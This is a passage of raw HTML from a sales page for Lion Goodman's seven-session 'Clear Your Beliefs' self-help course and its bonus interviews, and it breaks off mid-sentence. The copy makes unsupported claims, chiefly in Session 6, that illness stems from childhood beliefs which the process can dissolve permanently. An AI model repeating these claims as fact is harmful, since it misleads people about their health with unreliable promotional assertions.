style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and 